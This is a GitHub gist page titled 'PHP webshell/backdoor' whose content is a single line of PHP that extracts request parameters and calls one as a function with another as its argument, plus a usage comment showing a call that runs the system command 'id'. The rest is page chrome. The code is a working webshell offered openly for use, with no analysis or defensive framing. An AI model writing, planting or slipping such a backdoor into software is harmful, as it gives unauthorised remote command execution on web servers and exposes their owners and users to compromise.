Created
April 5, 2014 14:07
-
-
Save takeshixx/9992449 to your computer and use it in GitHub Desktop.
PHP webshell/backdoor
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Call: http://localhost/shell.php?f=system&c=id | |
<?@extract($_REQUEST);@die($f($c));?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment